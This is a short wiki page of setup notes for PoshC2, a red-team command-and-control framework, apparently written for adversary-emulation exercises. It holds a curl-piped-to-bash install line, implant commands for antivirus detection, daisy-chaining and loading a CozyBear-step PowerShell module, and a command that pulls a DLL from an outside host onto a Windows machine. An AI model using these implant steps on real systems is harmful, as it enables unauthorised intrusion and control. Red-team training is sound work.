C2 Matrix
Search…
PoshC2
PoshC2 is pretty well documented, below are my notes. Best to use the official documentation: https://poshc2.readthedocs.io/en/latest/
Demo of PoshC2 is in this Red Team Village and Texas Cyber Summit June'gle event:

Install PoshC2

1
sudo su -
2
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | bash
Copied!

Configure and Run PoshC2

1
sudo su -
2
cd /opt/PoshC2
3
posh-project -n test
4
posh-config
Copied!
Modify the values in the file, consider: BindIP; PayloadCommsHost; UserAgent

Launch Server

1
sudo su -
2
posh-server
Copied!
On launch, PoshC2 generates a number of payloads into /opt/PoshC2_Project and creates a quick start file.
1
cat /opt/PoshC2_Project/quickstart.txt
Copied!

Launch Handler

1
sudo su -
2
posh -u georgy
Copied!

Deploy Agent

Use the multitude of methods to deploy the agent from the quickstart.txt file.

Emulate TTPs

Run PowerShell Scripts

1
loadmodule /home/slingshot/CozyBear/stepTwelve.ps1
2
detectav
3
software
Copied!

Chaining

Run the following command from the implant you want to use as the daisy server.
1
startdaisy
Copied!

Download a file

1
web-upload-file -from 'https://mint.scythedemo.com/ServiceLogin?passive=Gc5H5HZdakKD8ZWuaUcX2Q&b=true' -to 'C:\Users\Jorge\Desktop\scythe.dll'
Copied!

Other Resources

Last modified 10mo ago